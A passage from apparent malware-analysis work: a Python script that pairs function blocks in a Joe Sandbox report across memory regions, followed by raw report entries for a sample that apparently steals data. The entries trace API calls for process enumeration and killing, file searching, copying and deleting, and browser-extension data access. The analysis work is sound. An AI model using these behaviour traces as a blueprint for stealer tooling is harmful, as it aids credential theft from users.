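    based_on_pe: bool = False
    api_string_id: str = ""
    calls: List[Call] = field(default_factory=list)

    def rvas(self) -> List[Tuple[str, int]]:
        """(normalised API name, call-site RVA relative to the dump base) for every call."""
        return [(normalise(c.api), c.ref - self.base) for c in self.calls]


def parse_blocks(text: str) -> List[FuncSummary]:
    """Split the report text on the 'APIs' label and fill one FuncSummary per block."""
    funcs: List[FuncSummary] = []
    cur: Optional[FuncSummary] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncSummary()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(Call(m["api"], m["mod"], int(m["ref"], 16),
                                  int(m["sub"], 16) if m["sub"] else None))
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.base, cur.based_on_pe = int(m["off"], 16), m["pe"] == "true"
            continue
        m = APISTR_RE.search(line)
        if m:
            cur.api_string_id = m["id"]
    return funcs


def pair_across_regions(funcs: List[FuncSummary]) -> Dict[str, List[Tuple[FuncSummary, FuncSummary]]]:
    """Pair blocks sharing an API String ID: one from a PE-backed dump, one from a non-PE region.
    Several blocks may share an ID in one region; they are paired in report order."""
    by_id: Dict[str, Dict[bool, List[FuncSummary]]] = defaultdict(lambda: {True: [], False: []})
    for f in funcs:
        if f.api_string_id:
            by_id[f.api_string_id][f.based_on_pe].append(f)
    return {k: list(zip(v[True], v[False])) for k, v in by_id.items() if v[True] and v[False]}


def rva_deltas(pe_func: FuncSummary, other: FuncSummary) -> List[Tuple[str, int]]:
    """Per-call RVA shift between two summaries, matched positionally on API name."""
    a, b = pe_func.rvas(), other.rvas()
    if len(a) != len(b) or any(x[0] != y[0] for x, y in zip(a, b)):
        raise ValueError("call sequences differ; these blocks are not the same routine")
    return [(x[0], y[1] - x[1]) for x, y in zip(a, b)]


def constant_shift(deltas: List[Tuple[str, int]]) -> Optional[int]:
    """The single shift if every call moved by the same amount, otherwise None."""
    shifts = {d for _, d in deltas}
    return shifts.pop() if len(shifts) == 1 else None


def has_copy_then_delete(f: FuncSummary) -> bool:
    """True if the routine's own (non-nested) calls copy a file and later delete a file."""
    seq = [normalise(c.api) for c in f.calls if c.subcall_of is None]
    return "CopyFile" in seq and "DeleteFile" in seq and seq.index("CopyFile") < seq.index("DeleteFile")


if __name__ == "__main__":
    for sid, pairs in pair_across_regions(parse_blocks(SAMPLE)).items():
        for pe_f, mem_f in pairs:
            d = rva_deltas(pe_f, mem_f)
            shift = constant_shift(d)
            print(f"{sid}: {pe_f.base:#x} -> {mem_f.base:#x}, "
                  + (f"constant RVA shift {shift:#x}" if shift is not None else f"shift varies: {d}"))
```

Run it on the full disassembly section rather than the sample and the pairing is done by API String ID alone, so two distinct routines that happen to share an ID (the report shows two 0x400000 functions with ID 211194620-0) are paired in report order; rva_deltas raises if the paired blocks' call sequences do not line up, which is the signal to re-pair by hand.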
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                            • API String ID: 998311485-3310892237
                                                            • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                            • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                            • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                            • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                            APIs
                                                            • memset.MSVCRT ref: 004194EB
                                                              • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                              • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                              • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                            • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                            • String ID:
                                                            • API String ID: 396451647-0
                                                            • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                            • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                            • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                            • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                            APIs
                                                            • memset.MSVCRT ref: 022E9752
                                                              • Part of subcall function 022E8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022E9785,00000000), ref: 022E8FC2
                                                              • Part of subcall function 022E8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E8FC9
                                                              • Part of subcall function 022E8FB7: wsprintfW.USER32 ref: 022E8FDF
                                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022E9812
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 022E9830
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E983D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                            • String ID:
                                                            • API String ID: 3729781310-0
                                                            • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                            • Instruction ID: 1966fd507f57be01be1918eb8ca97169c2c0f1f91db8edbb69edd4c07ebe01c6
                                                            • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                            • Instruction Fuzzy Hash: 843148B5E10248AFDF14DFE0CC49BEDB779EB45300F904419E506AA288DB786A88DF52
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                            • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                            • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • CloseHandle.KERNEL32(?), ref: 00418761
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1066202413-0
                                                            • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                            • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                            • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                            • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022E8931
                                                            • Process32First.KERNEL32(?,00000128), ref: 022E8945
                                                            • Process32Next.KERNEL32(?,00000128), ref: 022E895A
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • CloseHandle.KERNEL32(?), ref: 022E89C8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1066202413-0
                                                            • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                            • Instruction ID: 2b16b41d357271d2a048d5525aa5b60bff6fcd18246f052aa8a17739eb6b0277
                                                            • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                            • Instruction Fuzzy Hash: 07318C71911318EBCF24DF94CD84FEEB379EB55700F504199A10AA22A4DB346E84CFA1
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                            • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                            • lstrcatA.KERNEL32(?,008760B0), ref: 00414FAB
                                                            • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                            • String ID:
                                                            • API String ID: 2667927680-0
                                                            • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                            • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                            • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                            • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                            • wsprintfA.USER32 ref: 00418850
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                                            • String ID: %dx%d
                                                            • API String ID: 2716131235-2206825331
                                                            • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                            • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                            • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                            • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessstrtok_s
                                                            • String ID:
                                                            • API String ID: 3407564107-0
                                                            • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                            • Instruction ID: dada6b9641bc4c403908fecdb169cc63010fb239e5ee0ba82f92f2f6832552a2
                                                            • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                            • Instruction Fuzzy Hash: A41149B4910209EFCF04DFE4D948AEDBB75FF04305F408469E80AA6250E7705B14DF65
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                            • wsprintfA.USER32 ref: 004179F3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                                            • String ID:
                                                            • API String ID: 1243822799-0
                                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022E7C17
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7C1E
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022E7C2B
                                                            • wsprintfA.USER32 ref: 022E7C5A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                            • String ID:
                                                            • API String ID: 377395780-0
                                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction ID: 7ab8456280568004345be6c728328476938821766eb4fb1773edd4f3bdf85d72
                                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction Fuzzy Hash: 101139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF606A2280D3795940CBB1
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022E7CCA
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7CD1
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022E7CE4
                                                            • wsprintfA.USER32 ref: 022E7D1E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                            • String ID:
                                                            • API String ID: 3317088062-0
                                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction ID: 51186470935b5ea7dc09d66f4cb3f123c7afd4d01f53faeeaab8c5fbe378d6ae
                                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction Fuzzy Hash: 89115EB1A45218EFEB248B94DC49FA9B7B9FB05721F1043AAF51AA32C0D7745940CF51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID:
                                                            • API String ID: 3330995566-0
                                                            APIs
                                                            • CreateFileA.KERNEL32(022E3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022E3D55,?), ref: 022E9563
                                                            • GetFileSizeEx.KERNEL32(000000FF,022E3D55), ref: 022E9580
                                                            • CloseHandle.KERNEL32(000000FF), ref: 022E958E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleSize
                                                            • String ID:
                                                            • API String ID: 1378416451-0
                                                            APIs
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                                            • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                                            • ExitProcess.KERNEL32 ref: 022E6D89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                            • String ID:
                                                            • API String ID: 941982115-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `o@
                                                            • API String ID: 0-590292170
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                            • lstrcatA.KERNEL32(?,00879B78), ref: 00414C08
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00876020,?,000003E8), ref: 00414A4A
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: UaA
                                                            • API String ID: 2104210347-3893042857
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
